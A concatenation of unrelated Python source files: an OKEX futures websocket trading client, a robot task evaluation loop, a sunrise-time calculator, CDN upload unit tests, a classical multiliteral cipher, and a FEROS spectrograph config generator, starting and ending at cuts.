            logger.debug("OKEXFuture q_order_result: %s" % message)
            self.q_order_result.put(message)
        # status 2/-1: fully filled or cancelled -> record in order history
        if status == 2 or status == -1:
            try:
                # persist any order that actually traded (even if later cancelled)
                if status == 2 or (status == -1 and deal_amount):
                    data_store = Util.build_order_store(order_id=order_id,
                                                        side=side,
                                                        amount_filled=deal_amount,
                                                        time_stamp=order_time,
                                                        trade_pair=trade_pair,
                                                        price=price_avg or price,
                                                        client_order_id=0,
                                                        platform_name='okex_future',
                                                        platform_account_id=self.okex_id,
                                                        strategy_id=self.strategy_id,
                                                        fee_rate=self.fee_rate)
                    self.q_orders.put(data_store)
                if status == -1:
                    side = 'delete'
                else:
                    side = self.order_type[sub_trades[0]["data"]['type']]
                self.hist[side][order_id] = sub_trades[0]["data"]
                # evict the oldest entry once the per-side history is full
                if len(self.hist[side]) > self.hist_lenth:
                    self.hist[side].popitem(last=False)
            except Exception as ex:
                logger.error('OKEX Future: sub_trades %s' % ex)
    async def login(self, data):
        """Record a successful login response."""
        if data[0]['data']['result'] is True:
            self.update_flags['login'] = True
    async def update_depth(self, depth_data):
        """Handle a depth push: cache the book and feed the trigger queue."""
        try:
            list_of_ask = self.okex_depth_format(depth_data[0]["data"], "asks")
            list_of_bid = self.okex_depth_format(depth_data[0]["data"], "bids")
            self.depth = {"asks": list_of_ask, 'bids': list_of_bid}
            # message = {'bid_price': list_of_bid[0]['price'], 'message_type': 'depth update'}
            DepthIndexTrigger.Q_TRIGGER.put({"asks": list_of_ask, 'bids': list_of_bid, "name": self.name})
            self.update_flags["depth"] = True
        except Exception as ex:
            # NOTE(review): the caught exception `ex` is not reported, only
            # the raw payload -- presumably self.error comes from Market.
            self.error('OKEXFuture update_depth got: %s' % depth_data)
    async def update_ticker(self, ticker_data):
        """Cache the latest ticker payload as-is."""
        self.ticker = ticker_data
        self.update_flags['ticker'] = True
    async def update_trades(self, trades_data):
        """Cache the latest public trades as a list of dicts."""
        self.trades = [{'tid': t[0], 'price': t[1], 'amount': t[2], 'time': t[3], 'type': t[4]} for t in trades_data[0]['data']]
        self.update_flags['trades'] = True
    async def update_index_price(self, index_data):
        """Cache the index price and feed it to the trigger queue."""
        self.index_price = index_data[0]['data']
        self.index_price["futureIndex"] = float(self.index_price["futureIndex"])
        self.index_price.update({"name": "{}_index".format(self.name)})
        DepthIndexTrigger.Q_TRIGGER.put(self.index_price)
        self.update_flags['index_price'] = True
    async def update_trade(self, trade_data):
        '''
        Handle a place-order / cancel-order acknowledgement.
        :param trade_data: [{'data': {'result': True, 'order_id': 14420556515}, 'channel': 'ok_futuresusd_trade'}]
        :return: stores e.g. {'result': True, 'order_id': 14420556515} in self.trade
        '''
        if trade_data[0]["data"]['result'] is True:
            self.trade = trade_data[0]["data"]
        else:
            if trade_data[0]["data"]['error_code'] != 20015: # 20015: order already filled/cancelled
                logger.error('Order err %s' %(trade_data[0]["data"]['error_code']))
        self.update_flags['trade'] = True
    async def update_get_order(self, order_data):
        '''
        Store the raw order-query response in self.order.
        :param order_data: [{'data': {'result': True, 'orders': [{...,
            'order_id': ..., 'status': ...}]}, 'channel': 'ok_futureusd_orderinfo'}]
        '''
        self.order = order_data[0]["data"]
        self.update_flags['get_order'] = True
    async def update_get_account(self, account_data):
        '''
        Store the per-currency account info dict in self.account.
        :param account_data: [{'data': {'result': True, 'info': {'btc':
            {'balance': ..., 'rights': ..., 'contracts': [...]}, ...}},
            'channel': 'ok_futureusd_userinfo'}]
        '''
        if account_data[0]["data"]['result'] is True:
            self.account = account_data[0]["data"]['info']
        self.update_flags['get_account'] = True
    def update(self, flags):
        '''
        Busy-wait (from a non-loop thread) until all given flags have been
        set True by their handlers, or raise TimeoutError.
        :param flags: {"depth": True, 'trade': False}
        :return: self
        '''
        self.unset_flags(flags)
        self.register_callbacks()
        timeout = self.timeout
        start = time.time()
        while True:
            time.sleep(0.001)
            if (self.check_flags(flags)):
                break
            if time.time() - start > timeout:
                raise TimeoutError
        self.remove_callbacks()
        return self
    def long(self, amount, price=-1, lever_rate='10'):
        """Open a long position (market order unless price > 0)."""
        logger.debug("OKEXFuture Long: %s @%s, lever_rate=%s" % (amount, price, lever_rate))
        message = self.build_message(price=price, amount=amount, type='1', lever_rate=lever_rate, channel=Constants.OKEX_FUTURE_TRADE_WS)
        # asyncio.Queue is not thread safe
        self.loop.call_soon_threadsafe(self.q.put_nowait, message)
        self.update({'trade': False})
        logger.debug("OKEXFuture Long Result: %s" % self.trade)
        return self.trade
    def short(self, amount, price=-1, lever_rate='10'):
        """Open a short position (market order unless price > 0)."""
        logger.debug("OKEXFuture Short: %s @%s, lever_rate=%s" % (amount, price, lever_rate))
        message = self.build_message(price=price, amount=amount, type='2', lever_rate=lever_rate, channel=Constants.OKEX_FUTURE_TRADE_WS)
        self.loop.call_soon_threadsafe(self.q.put_nowait, message)
        self.update({'trade': False})
        logger.debug("OKEXFuture Short Result: %s" % self.trade)
        return self.trade
    def closeLong(self, amount, price=-1):
        """Close (part of) a long position."""
        logger.debug("OKEXFuture closeLong: %s @%s" % (amount, price))
        message = self.build_message(price=price, amount=amount, type='3', channel=Constants.OKEX_FUTURE_TRADE_WS)
        self.loop.call_soon_threadsafe(self.q.put_nowait, message)
        self.update({'trade': False})
        logger.debug("OKEXFuture closeLong Result: %s" % self.trade)
        return self.trade
    def closeShort(self, amount, price=-1):
        """Close (part of) a short position."""
        logger.debug("OKEXFuture closeShort: %s @%s" % (amount, price))
        message = self.build_message(price=price, amount=amount, type='4', channel=Constants.OKEX_FUTURE_TRADE_WS)
        self.loop.call_soon_threadsafe(self.q.put_nowait, message)
        self.update({'trade': False})
        logger.debug("OKEXFuture closeShort Result: %s" % self.trade)
        return self.trade
    def deleteOrder(self, order_id, tillOK=True):
        '''
        Cancel an order, optionally retrying until it has left the
        pending states.
        :param order_id: id of the order to cancel
        :param tillOK: keep retrying until the order is no longer pending
        :return: e.g. {'result': True, 'order_id': '14435081666'}
        status(int): order status (0 pending, 1 partially filled,
            2 fully filled, -1 cancelled, 4 cancel in progress)
        '''
        logger.debug("OKEXFuture deleteOrder: id %s" % order_id)
        while True:
            try:
                message = self.build_message(order_id=order_id, channel=Constants.OKEX_FUTURE_DELETE_ORDER_WS)
                self.loop.call_soon_threadsafe(self.q.put_nowait, message)
                self.update({'trade': False})
                if tillOK:
                    order = self.getOrder(order_id)
                    logger.debug("OKEXFuture deleteOrder Result: %s" % order)
                    if 'status' in order:
                        status = order['status']
                        # still pending/partially filled: retry the cancel
                        if status == 0 or status == 1:
                            logger.error(order)
                            continue
                else:
                    logger.debug("OKEXFuture deleteOrder Result: %s" % self.trade)
                return self.trade
            except Exception as e:
                self.error("OKEXFuture deleteOrder %s" % e)
                if tillOK:
                    continue
                return None
    def getOrder(self, order_id=None, tillOK=True):
        '''
        Query a single order (by id) or all active orders.
        :param order_id: order id to query; None queries all active orders
        :param tillOK: retry until the query succeeds
        :return: with order_id: the order dict (its 'type' translated via
            self.order_type), or None when no order matches; without
            order_id: a dict mapping order_id -> order dict for active
            orders.
        '''
        if order_id:
            while True:
                try:
                    # message = self.build_message(channel=Constants.OKEX_FUTURE_GET_HIST_WS)
                    message = self.build_message(order_id=order_id, channel=Constants.OKEX_FUTURE_GET_ORDER_WS)
                    self.loop.call_soon_threadsafe(self.q.put_nowait, message)
                    self.update({'get_order': False})
                    order = self.order
                    if 'result' in order:
                        if order['result'] is True:
                            order['orders'][0]['type'] = self.order_type[int(order['orders'][0]['type'])]
                            return order['orders'][0] if order['orders'] else None
                        if tillOK:
                            continue
                        else:
                            logger.error(order)
                            break
                except Exception as e:
                    self.error("OKEXFuture getOrder %s" % e)
                    if tillOK:
                        continue
                    return None
        else:
            # order_id=-1 with status=1 queries unfilled (active) orders
            message = self.build_message(order_id='-1', status='1', current_page='1', page_length='50', channel=Constants.OKEX_FUTURE_GET_ORDER_WS)
            self.loop.call_soon_threadsafe(self.q.put_nowait, message)
            self.update({'get_order': False})
            active_order = {}
            orders = self.order
            for order in orders["orders"]:
                order_id = order['order_id']
                active_order[order_id] = order
            return active_order
    def getAccount(self, coin=[]):
        """Return account info, optionally filtered to the given coins.

        NOTE(review): mutable default argument ``coin=[]`` -- harmless here
        because it is never mutated, but worth cleaning up.
        """
        message = self.build_message(channel=Constants.OKEX_FUTURE_USERINFO_WS)
        self.loop.call_soon_threadsafe(self.q.put_nowait, message)
        self.update({'get_account': False})
        try:
            if coin:
                ret = {}
                for c in coin:
                    if c.lower() in self.account:
                        ret[c.lower()] = self.account[c.lower()]
                    else:
                        # coin unknown to the account: report empty balances
                        ret[c.lower()] = {'balance': 0.0, 'rights': 0.0, 'contracts': []}
                return ret
            else:
                return self.account
        except Exception as ex:
            self.error("OKEXFuture getAccount %s" % ex)
    async def send(self):
        """Forward queued outbound messages to the websocket forever."""
        # give the login request time to complete first
        await asyncio.sleep(1)
        while True:
            message = await self.q.get()
            await self.websocket.send(message)
    def getHist(self):
        """Return the per-side order history dict."""
        return self.hist
    def build_message(self, channel, event='addChannel', **kwargs):
        '''
        Build a signed request string for the given channel.
        :param channel: subscribe channel
        :param event: default 'addChannel'
        :param kwargs: channel-specific parameters (order_id, amount, ...)
        :return: str(dict) payload ready to send over the websocket
        '''
        params = {}
        # cancel-order / query-order channels
        if channel is Constants.OKEX_FUTURE_DELETE_ORDER_WS or channel is Constants.OKEX_FUTURE_GET_ORDER_WS:
            order_id = kwargs.get('order_id')
            status = kwargs.get('status', None)
            params = {'api_key': self.apikey, 'symbol': self.symbol, 'contract_type': self.contract_type, 'order_id': order_id}
            if status:
                params['status'] = status
                params['current_page'] = kwargs.get('current_page', None)
                params['page_length'] = kwargs.get('page_length', None)
        # place-order channel
        elif channel is Constants.OKEX_FUTURE_TRADE_WS:
            params = {'api_key': self.apikey, 'symbol': self.symbol, 'contract_type': self.contract_type,
                      'amount': str(kwargs.get('amount')), 'type': str(kwargs.get('type')), 'match_price': "1",
                      'lever_rate': str(kwargs.get('lever_rate', 10))}
            price = kwargs.get('price', None)
            # a positive price means a limit order instead of match-price
            if price > 0:
                params['match_price'] = "0"
                params['price'] = str(price)
        # default parameters (login, account queries, ...)
        else:
            params = {'api_key': self.apikey}
        params['sign'] = self.buildMySign(params, self.apisec)
        message = str({'event': event, 'channel': channel, 'parameters': params})
        return message
    def buildMySign(self, params, secretKey):
        """MD5-sign the request parameters per the OKEX convention."""
        sign = ''
        for key in sorted(params.keys()):
            sign += key + '=' + str(params[key]) + '&'
        return hashlib.md5((sign + 'secret_key=' + secretKey).encode("utf-8")).hexdigest().upper()
    def parse_meta(self, meta_code):
        """Map a meta code to (market_currency, base_currency, symbol, contract_type)."""
        meta_table = {
            "btc_usd_this_week": ("btc", "usd", "btc_usd", "this_week"),
            "btc_usd_next_week": ("btc", "usd", "btc_usd", "next_week"),
            "btc_usd_quarter": ("btc", "usd", "btc_usd", "quarter"),
            "eth_usd_this_week": ("eth", "usd", "eth_usd", "this_week"),
            "eth_usd_next_week": ("eth", "usd", "eth_usd", "next_week"),
            "eth_usd_quarter": ("eth", "usd", "eth_usd", "quarter"),
        }
        return meta_table[meta_code]
    async def ws_init(self):
        """Post-connect initialization: subscribe and log in."""
        await self.sub_channel()
    async def ws_handler(self):
        '''
        Receive loop running in the background thread: reads websocket
        messages and dispatches them to the handler registered for their
        channel.  On a 20 s receive timeout it pings the server; an
        unanswered ping (10 s) ends the loop so run() can reconnect.
        '''
        while True:
            channel = None
            try:
                data = await asyncio.wait_for(self.websocket.recv(), timeout=20)
            except asyncio.TimeoutError:
                # No data in 20 seconds, check the connection.
                try:
                    pong_waiter = await self.websocket.ping()
                    await asyncio.wait_for(pong_waiter, timeout=10)
                except asyncio.TimeoutError:
                    # No response to ping in 10 seconds, disconnect.
                    self.error('ws_handler: receive time out')
                    break
            except Exception as ex:
                # Any other receive failure: try to reconnect, then re-ping.
                try:
                    logger.error('ws_handler: %s' % ex)
                    await self.keep_connect()
                    await asyncio.sleep(5)
                    pong_waiter = await self.websocket.ping()
                    await asyncio.wait_for(pong_waiter, timeout=10)
                except asyncio.TimeoutError:
                    # No response to ping in 10 seconds, disconnect.
                    break
            else:
                # normal path: dispatch the message by channel name
                data = json.loads(data)
                # print(data)
                channel = data[0].get("channel", None)
                if channel in self.methods:
                    if self.methods[channel] != None:
                        await self.methods[channel](data)
                else:
                    pass
    def run(self):
        """Thread entry point: (re)connect and run the receive/send tasks."""
        asyncio.set_event_loop(self.loop)
        while True:
            try:
                self.loop.run_until_complete(self.keep_connect())
                self.loop.run_until_complete(self.ws_init())
                tasks = [self.ws_handler(), self.send()]
                # reconnect as soon as either task exits
                self.loop.run_until_complete(asyncio.wait(tasks, return_when=asyncio.FIRST_COMPLETED))
                time.sleep(1)
            except Exception as ex:
                self.error(ex)
def test_btc_usd_this_week():
    """Manual smoke test: market-order one this-week BTC contract."""
    os.environ[Constants.DQUANT_ENV] = "dev"
    event_loop = asyncio.new_event_loop()
    market = OkexFutureWs("btc_usd_this_week", event_loop)
    market.start()
    # Other manual probes, kept for reference:
    # print(market.get_ticker())
    # import pdb; pdb.set_trace()
    # print(market.get_ticker())
    # print(market.getDepth())
    print(market.long(amount=1))
    # print(market.getAccount())
def test_btc_usd_quarter():
    """Manual smoke test: fetch the quarterly BTC index price."""
    os.environ[Constants.DQUANT_ENV] = "dev"
    event_loop = asyncio.new_event_loop()
    market = OkexFutureWs("btc_usd_quarter", event_loop)
    market.start()
    # print(market.get_ticker())
    print(market.get_index_price())
    # print(market.getDepth())
    # print(market.get_trades())
    # print(market.getAccount())
if __name__ == "__main__":
test_btc_usd_quarter()
#test_btc_usd_this_week() |
from collections import OrderedDict, defaultdict
import os
import numpy as np
from env.tasks import HomeServiceTaskSampler, HomeServiceTaskType
from experiments.home_service_base import HomeServiceBaseExperimentConfig
from PIL import Image
import argparse
import torch
import torch.backends.cudnn as cudnn
import pickle
# Interactive evaluation loop: sample SIMPLE_PICK_AND_PLACE tasks and
# drive them manually by typing action indices at a pdb breakpoint.
task_sampler_params = HomeServiceBaseExperimentConfig.stagewise_task_sampler_args(
    stage="train", process_ind=0, total_processes=1, headless=False
)
task_sampler: HomeServiceTaskSampler = HomeServiceBaseExperimentConfig.make_sampler_fn(
    **task_sampler_params,
    task_type=HomeServiceTaskType.SIMPLE_PICK_AND_PLACE,
    force_cache_reset=True,
    epochs=1,
)
num_tasks = 500
success = 0
for i in range(num_tasks):
    print(f'{i}-th task')
    task = task_sampler.next_task()
    print(f' task: {task.env.current_task_spec.task_type}')
    while not task.is_done():
        # Observations are fetched so they can be inspected inside pdb.
        obs = task.get_observations()
        # Deliberate breakpoint: this script is an interactive driver.
        import pdb; pdb.set_trace()
        action_ind = int(input("action_ind="))
        step_result = task.step(action=action_ind)
        # A successful episode ends with the agent issuing "done".
        if step_result.info['action_name'] == "done":
            success += 1
    print(f'{i}-th task done')
task_sampler.close()
# Typo fixed: "finishied" -> "finished".
print(f'finished {num_tasks} tasks')
print(f'Success {success} out of {num_tasks}')
|
"""
The SunEquation class is used approximately calculate the sunset and
sunrise times using the Sunrise Equation found on Wikipedia.
"""
import math
import logging
# from datetime import datetime, timezone
import datetime
import pytz
from tzlocal import get_localzone
class SunEquation:
    """
    Used to calculate sunrise and sunset times for the current day,
    using the full sunrise equation as found on Wikipedia:
    https://en.wikipedia.org/wiki/Sunrise_equation

    The sunrise and sunset times obtained are accurate to within a few
    minutes.
    """

    def __init__(self, latitude, longitude):
        """
        :param latitude: observer latitude in degrees (north positive).
        :param longitude: observer longitude in degrees (west negative,
            east positive, following the Wikipedia convention).
        """
        self.date_today = datetime.date.today()
        self.longitude_west = longitude
        self.latitude = latitude
        self.jdn = None        # Julian Day Number of today (set by julian_date)
        self.rise = None       # sunrise datetime, local tz (set by suntimes)
        self.set = None        # sunset datetime, local tz (set by suntimes)
        self.timezone = None   # local timezone used for rise/set

    def calculate(self):
        """
        Calculate sunrise and sunset datetime objects based upon the
        Wikipedia Sunrise Equation formulae.

        :return: (sunrise, sunset) timezone-aware datetimes.
        """
        logging.debug("New day, new calculations")
        n = self.current_julian_day()
        j_star = self.mean_solar_moon(n, self.longitude_west)
        m = self.solar_mean_anomaly(j_star)
        c = self.equation_of_the_centre(m)
        lam = self.ecliptic_longitude(m, c)
        j_transit = self.solar_transit(j_star, m, lam)
        theta = self.declination_of_the_sun(lam)
        w_o = self.hour_angle(self.latitude, theta)
        self.suntimes(j_transit, w_o)
        return self.rise, self.set

    def current_julian_day(self):
        """
        Return the number of days since the J2000 epoch for today:

            n = JDN - 2451545.0 + 0.0008
        """
        jdn = self.julian_date(
            self.date_today.year,
            self.date_today.month,
            self.date_today.day)
        n = jdn - 2451545.0 + 0.0008
        logging.debug("Current julian day %s", str(n))
        return n

    def julian_date(self, year, month, day):
        """
        Return the Julian Day Number of a Gregorian calendar date
        (Fliegel & Van Flandern algorithm).

        Bug fix: the original used Python 3 true division, which turned
        every term into a float and produced a JDN wrong by a fraction
        of a day.  The algorithm requires integer division, with the
        (month - 14) / 12 term truncated toward zero.
        """
        a = int((month - 14) / 12)  # toward-zero trunc: -1 for Jan/Feb, else 0
        self.jdn = ((1461 * (year + 4800 + a)) // 4
                    + (367 * (month - 2 - 12 * a)) // 12
                    - (3 * ((year + 4900 + a) // 100)) // 4
                    + day - 32075)
        logging.debug("Julian day calculated: %s", str(self.jdn))
        return self.jdn

    def mean_solar_moon(self, n, longitude_west):
        """
        Return the mean solar time J* ("mean solar noon" -- the "moon" in
        the method name is a historical typo, kept for API compatibility).

        :param n: days since 1st Jan 2000, from current_julian_day().
        :param longitude_west: observer longitude, west negative / east
            positive.
        """
        j_star = n - (longitude_west/360)
        logging.debug("Mean solar moon: %s", str(j_star))
        return j_star

    def solar_mean_anomaly(self, j_star):
        """
        Return the solar mean anomaly M (degrees) for the mean solar
        time j_star from mean_solar_moon().
        """
        m = (357.5291 + 0.98560028 * j_star) % 360
        logging.debug("Solar mean anaomly: %s", str(m))
        return m

    def equation_of_the_centre(self, m):
        """
        Return the equation of the centre C (degrees) for mean anomaly m.
        """
        c = 1.9148*math.sin(math.radians(m)) \
            + 0.0200*math.sin(math.radians(2*m)) \
            + 0.0003*math.sin(math.radians(3*m))
        logging.debug("Equation of the center: %s", str(c))
        return c

    def ecliptic_longitude(self, m, c):
        """
        Return the ecliptic longitude lambda (degrees).
        """
        lam = (m + c + 180 + 102.9372) % 360
        logging.debug("Ecliptic longitude: %s", str(lam))
        return lam

    def solar_transit(self, j_star, m, lam):
        """
        Return the Julian date of local solar transit (solar noon).

        NOTE(review): uses 2451545.5 (midnight-referenced) rather than
        Wikipedia's 2451545.0; the epoch offset cancels in suntimes()
        where self.jdn is subtracted, so the half day places the transit
        relative to midnight -- confirm before changing.
        """
        j_transit = 2451545.5 + j_star \
            + 0.0053*math.sin(math.radians(m)) \
            - 0.0069*math.sin(math.radians(2*lam))
        logging.debug("Solar transient: %s", str(j_transit))
        return j_transit

    def declination_of_the_sun(self, lam):
        """
        Return the declination of the sun (degrees) for ecliptic
        longitude lam.
        """
        theta = math.degrees(
            math.asin(
                math.sin(math.radians(lam))
                * math.sin(math.radians(23.44))))
        logging.debug("Declination of the Sun: %s", str(theta))
        return theta

    def hour_angle(self, latitude, theta, a=0):
        """
        Return the hour angle w0 (degrees) between solar noon and
        sunrise/sunset:

            cos(w0) = (sin(-0.83 + a) - sin(lat)*sin(theta))
                      / (cos(lat)*cos(theta))

        :param a: optional altitude correction (degrees).

        Bug fix: the original wrapped the entire numerator inside the
        first sin() call -- sin(radians(-0.83+a) - sin(lat)*sin(theta)) --
        instead of sin(radians(-0.83+a)) - sin(lat)*sin(theta).
        """
        w_o = math.degrees(
            math.acos(
                (math.sin(math.radians(-0.83 + a))
                 - math.sin(math.radians(latitude))
                 * math.sin(math.radians(theta)))
                / (math.cos(math.radians(latitude))
                   * math.cos(math.radians(theta)))))
        logging.debug("Hour angle: %s", str(w_o))
        return w_o

    def suntimes(self, j_transit, w_o):
        """
        Compute self.rise and self.set as timezone-aware datetimes for
        today, converted to the local timezone.
        """
        j_rise = j_transit - w_o/360
        j_set = j_transit + w_o/360
        # day fractions from local midnight (self.jdn cancels the epoch)
        t_rise = j_rise - self.jdn
        t_set = j_set - self.jdn
        logging.debug("Rise")
        rise_temp = self.julian_to_timedelta(t_rise)
        logging.debug("Set")
        set_temp = self.julian_to_timedelta(t_set)
        tz = get_localzone()  # Need to replace to reduce dependency by 1
        today = datetime.datetime(
            datetime.date.today().year,
            datetime.date.today().month,
            datetime.date.today().day,
            hour=0,
            tzinfo=pytz.timezone('UTC')
        )
        self.rise = rise_temp + today
        self.set = set_temp + today
        self.rise = self.rise.astimezone(tz)
        self.set = self.set.astimezone(tz)
        self.timezone = tz
        logging.debug("Sunrise: %s", self.rise.strftime("%d/%m/%y %H:%M %p %Z"))
        # Bug fix: this log line was mislabeled "Sunrise".
        logging.debug("Sunset: %s", self.set.strftime("%d/%m/%y %H:%M %p %Z"))

    def julian_to_timedelta(self, julian):
        """
        Convert a fraction of a Julian day into a timedelta.
        """
        # 19/03/01 Removed "assert julian < 1", which may have been failing
        # because of the NZ timezone. Requires further testing.
        hour = math.floor(julian*24)
        minute = math.floor((julian*24-hour)*60)
        delta = datetime.timedelta(hours=hour, minutes=minute)
        logging.debug("Time Delta: %s", str(delta))
        return delta

    def format_yaml(self):
        """
        Return date, sunrise and sunset times as a dict of ISO-formatted
        strings, ready to be written to a file.
        """
        today = datetime.date.today().isoformat()
        rise = self.rise.isoformat()
        fall = self.set.isoformat()
        # Workaround: tied to using get_localzone() in suntimes().
        # Gathering the current timezone some other way would remove
        # that dependency.
        timezone = self.rise.tzinfo.zone
        output = {
            "date": today,
            "sunrise": rise,
            "sunset": fall,
            "timezone": timezone,
        }
        return output
|
import time
import unittest
from cdn_origin.origin import Origin
from cdn_origin.origin_set import OriginSet
class TestOriginSet(unittest.TestCase):
    """Exercise OriginSet fan-out uploads and its wait() timeout logic."""

    def upload_dummy_1(self, dest_name: str, data: bytes, job_types: str, info: None):
        """Fake upload callback that logs its arguments and takes ~0.1 s."""
        print('upload_dummy_1', dest_name, data, job_types, info)
        time.sleep(0.1)

    def upload_dummy_2(self, dest_name: str, data: bytes, job_types: str, info: None):
        """Fake upload callback that logs its arguments and takes ~0.1 s."""
        print('upload_dummy_2', dest_name, data, job_types, info)
        time.sleep(0.1)

    def upload_dummy_3(self, dest_name: str, data: bytes, job_types: str, info: None):
        """Slow fake upload callback (~0.5 s)."""
        # Bug fix: this previously printed the label 'upload_dummy_2'.
        print('upload_dummy_3', dest_name, data, job_types, info)
        time.sleep(0.5)

    def test_tasks_success(self):
        """Both origins finish within the cumulative wait windows."""
        origin_set = OriginSet([Origin(self.upload_dummy_1), Origin(self.upload_dummy_2)])
        origin_set.upload('dummy', b'some_data', 'type_a', 'info')
        self.assertFalse(origin_set.wait(0.05))  # still uploading
        self.assertTrue(origin_set.wait(0.09))   # done by now
        self.assertTrue(origin_set.wait(0.01))   # stays done
        origin_set.close()

    def test_one_completed(self):
        """wait() reflects progress when one origin is still running."""
        origin_set = OriginSet([Origin(self.upload_dummy_1), Origin(self.upload_dummy_3)])
        origin_set.upload('dummy', b'some_data', 'type_a', 'info')
        self.assertFalse(origin_set.wait(0.05))
        self.assertTrue(origin_set.wait(0.1))
        origin_set.close()
|
# -*- coding: UTF-8 -*-
# @File: multiliteral.py
# @Author: SCERush
# @Contact: 1037920609@qq.com
# @Datetime: 20/7/5 17:30
# @Software: PyCharm
"""
文件说明:multiliteral密码
"""
import re
# 25-letter Polybius alphabet (I and J share a cell, so J is omitted)
keywordList = "ABCDEFGHIKLMNOPQRSTUVWXYZ"
def removePunctuation(text):
    """Upper-case *text* and strip every character outside A-Z."""
    # Renamed the local pattern variable: the original shadowed the
    # builtin ``filter``.
    pattern = '[^A-Z]'
    return re.sub(pattern, '', text.upper())
def encrypt(plaintext, key):
    """
    Encrypt with the multiliteral cipher: each plaintext letter's
    row/column in the 5x5 alphabet grid is encoded as the pair of key
    letters at those positions.

    :param plaintext: text to encrypt (non-letters are stripped, J -> I)
    :param key: 5-letter key whose letters label the grid rows/columns
    :return: ciphertext, two key letters per plaintext letter
    """
    plain = removePunctuation(plaintext).replace('J', 'I')
    key = key.upper()
    pairs = []
    for letter in plain:
        # divmod replaces the original int(index / 5) and index % 5 pair
        row, col = divmod(keywordList.index(letter), 5)
        pairs.append(key[row])
        pairs.append(key[col])
    # join once instead of quadratic string concatenation
    return ''.join(pairs)
def decrypt(ciphertext, key):
    """
    Decrypt the multiliteral cipher: consume the ciphertext two letters
    at a time; their positions in the key give the row and column of the
    plaintext letter in the 5x5 alphabet grid.

    :param ciphertext: text to decrypt (non-letters stripped, J -> I)
    :param key: 5-letter key used for encryption
    :return: recovered plaintext (upper-case, J folded into I)
    """
    cipher = removePunctuation(ciphertext).replace('J', 'I')
    key = key.upper()
    letters = []
    for idx in range(0, len(cipher), 2):
        row = key.index(cipher[idx])
        col = key.index(cipher[idx + 1])
        letters.append(keywordList[row * 5 + col])
    return ''.join(letters)
if __name__ == '__main__':
    # Round-trip demo; note any 'J' in the plaintext would come back as 'I'.
    m = "Multilieral"
    key = "codes"
    c = encrypt(m, key)
    print(c)
    d = decrypt(c, key)
    print(d)
|
import os
import re
import datetime
import dateutil.parser
import configparser
import numpy as np
import astropy.io.fits as fits
from astropy.table import Table
from ...utils.misc import extract_date
from ..common import load_obslog, load_config
from .common import print_wrapper, get_ccd_geometry
from .reduce import reduce_feros
def make_config():
    """Generate a config file for reducing the data taken with FEROS.

    Interactively asks for the observation date (pre-filled with a guess
    extracted from the current directory name) and writes
    ``FEROS.<date>.cfg`` into the working directory.
    """
    # find date of data obtained from the current directory name
    current_pathname = os.path.basename(os.getcwd())
    guess_date = extract_date(current_pathname)

    # Prompt until a usable date is available; an empty/unparseable answer
    # falls back to the guess when there is one.
    while True:
        if guess_date is None:
            prompt = 'YYYYMMDD'
        else:
            prompt = guess_date
        string = input('Date of observation [{}]: '.format(prompt))
        input_date = extract_date(string)
        if input_date is None:
            if guess_date is None:
                continue
            input_date = guess_date
        break

    # parse (and thereby validate) the chosen date string
    input_datetime = datetime.datetime.strptime(input_date, '%Y-%m-%d')

    direction = 'yr-'

    # general database path for this instrument
    dbpath = '~/.gamse/FEROS'

    # create config object
    config = configparser.ConfigParser()

    config.add_section('data')
    config.set('data', 'telescope', 'MPG/ESO-2.2m')
    config.set('data', 'instrument', 'FEROS')
    config.set('data', 'rawpath', 'rawdata')
    config.set('data', 'statime_key', 'OBS-DATE')
    config.set('data', 'exptime_key', 'EXPTIME')
    config.set('data', 'direction', direction)

    config.add_section('reduce')
    config.set('reduce', 'midpath', 'midproc')
    config.set('reduce', 'figpath', 'images')
    config.set('reduce', 'odspath', 'onedspec')
    config.set('reduce', 'mode', 'normal')
    config.set('reduce', 'oned_suffix', 'ods')
    config.set('reduce', 'fig_format', 'png')
    config.set('reduce', 'ncores', 'max')

    # section of bias correction
    sectname = 'reduce.bias'
    config.add_section(sectname)
    config.set(sectname, 'bias_file', '${reduce:midpath}/bias.fits')
    config.set(sectname, 'cosmic_clip', str(10))
    config.set(sectname, 'maxiter', str(5))
    config.set(sectname, 'smooth', 'yes')
    config.set(sectname, 'smooth_method', 'gaussian')
    config.set(sectname, 'smooth_sigma', str(3))
    config.set(sectname, 'smooth_mode', 'nearest')

    # section of order trace
    sectname = 'reduce.trace'
    config.add_section(sectname)
    config.set(sectname, 'minimum', str(8))
    config.set(sectname, 'scan_step', str(100))
    config.set(sectname, 'separation', '500:20, 1500:30, 3500:52')
    config.set(sectname, 'filling', str(0.3))
    config.set(sectname, 'align_deg', str(2))
    config.set(sectname, 'display', 'no')
    config.set(sectname, 'degree', str(3))

    # write to config file; `with` guarantees the file is closed
    filename = 'FEROS.{}.cfg'.format(input_date)
    with open(filename, 'w') as outfile:
        for section in config.sections():
            # align the '=' signs on the longest key of each section
            maxkeylen = max(len(key) for key in config[section].keys())
            outfile.write('[{}]'.format(section)+os.linesep)
            fmt = '{{:{}s}} = {{}}'.format(maxkeylen)
            for key, value in config[section].items():
                outfile.write(fmt.format(key, value)+os.linesep)
            outfile.write(os.linesep)

    print('Config file written to {}'.format(filename))
def make_obslog():
    """Scan the raw data, and generate a log file containing the detailed
    information for each frame.

    The observing log is written to ``<obsdate>.obslog`` in the current
    directory; if that file already exists, an integer suffix is appended
    (``<obsdate>.1.obslog``, ...) so an existing log is never overwritten.
    """
    # load config file (raw string: '\S' is an invalid escape sequence in a
    # plain string literal and is deprecated in python 3)
    config = load_config(r'FEROS\S*\.cfg$')
    rawpath = config['data'].get('rawpath')

    # scan the raw files
    fname_lst = sorted(os.listdir(rawpath))

    # prepare logtable
    logtable = Table(dtype=[
            ('frameid',  'i4'),
            ('fileid',   'S23'),
            ('imgtype',  'S3'),
            ('datatype', 'S11'),
            ('object',   'S15'),
            ('exptime',  'f4'),
            ('binning',  'S6'),
            ('nsat',     'i4'),
            ('q95',      'i4'),
            ])

    # filename pattern, e.g. "FEROS.2016-01-01T00:00:00.000.fits"
    pattern = r'FEROS\.\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{3}\.fits'

    # start scanning the raw files
    frameid = 0
    for fname in fname_lst:
        if not re.match(pattern, fname):
            continue
        # characters [6:29] of the filename hold the ISO timestamp
        fileid = fname[6:29]
        filename = os.path.join(rawpath, fname)
        data, head = fits.getdata(filename, header=True)
        # NOTE(review): parsed but otherwise unused; kept because it also
        # validates the DATE-OBS card -- confirm whether it can be dropped
        obsdate = dateutil.parser.parse(head['DATE-OBS'])
        exptime = head['EXPTIME']
        objectname = head['OBJECT']

